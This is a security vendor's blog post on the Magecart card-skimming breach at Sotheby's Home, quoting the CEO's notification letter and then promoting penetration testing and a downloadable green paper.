Sotheby’s Home is latest victim of Magecart hacking technique

On October 10, Sotheby’s Home discovered it had become a victim of the ‘Magecart’ hacking technique. ‘Magecart’ refers to a toolkit of malicious software deployed by multiple criminal hacker groups that intercept payment card information when a user attempts to make a payment through an e-commerce website.

Sotheby’s customers entering their PII (personally identifiable information) during the checkout process may have had their names, emails, and credit card information stolen.

In a letter to customers, Sotheby’s Home CEO Elizabeth Brown said:

“On October 10, we became aware that an unknown third party had gained unauthorized access to the Sotheby’s Home website and inserted malicious code which, depending on the security settings of your computer, may have transmitted personal information you entered into the website’s checkout form to this third party.  Upon discovery, we promptly removed the code, which we believe was present on the website since at least March 2017.  Based on our investigation into this incident, however, we cannot be certain as to when the website was first victimized by this attack. Accordingly, in an abundance of caution, we are notifying all Sotheby’s Home website customers (including those who made purchases on the Viyet website) that it is possible that their information has been accessed by an unauthorized party.”

British Airways, Newegg, Ticketmaster, and Vision Direct have also been hit by Magecart. Like other online retailers, Sotheby’s Home notified customers, implemented additional security safeguards, launched an investigation, and offered online shopping safety tips

Sadly, the theme of getting attacked, a letter sent to customers, suffering reputational and financial damage has become too common – almost expected. Yet, it doesn’t have to be that way.

Consider penetration testing

Regular penetration testing can prevent cyber criminals from exploiting vulnerabilities in web servers, browsers, email clients, POS (point of sale) software, operating systems, and server interfaces.

Penetration tests provide an end-of-state check to make sure all required security controls have been implemented correctly. They can also be used in the early stages of development of new processing systems to identify potential risks to personal data.

Why conduct a penetration test?

An organization should carry out a penetration test:

  • In response to the impact of a serious breach on a similar organization
  • To comply with a regulation or standard, such as the PCI DSS (Payment Card Industry Data Security Standard) or the EU’s GDPR (General Data Protection Regulation)
  • To ensure the security of new applications, or following significant changes to existing applications or business processes
  • To manage the risks of using a greater number and variety of outsourced services
  • To assess the risk of critical data or systems being compromised

There are four types of penetration test, each focusing on a particular aspect of an organization’s logical perimeter.

Download our Green Paper

Learn how to protect your organization’s networks and web applications by reading our detailed penetration testing green paper.  Download the green paper here.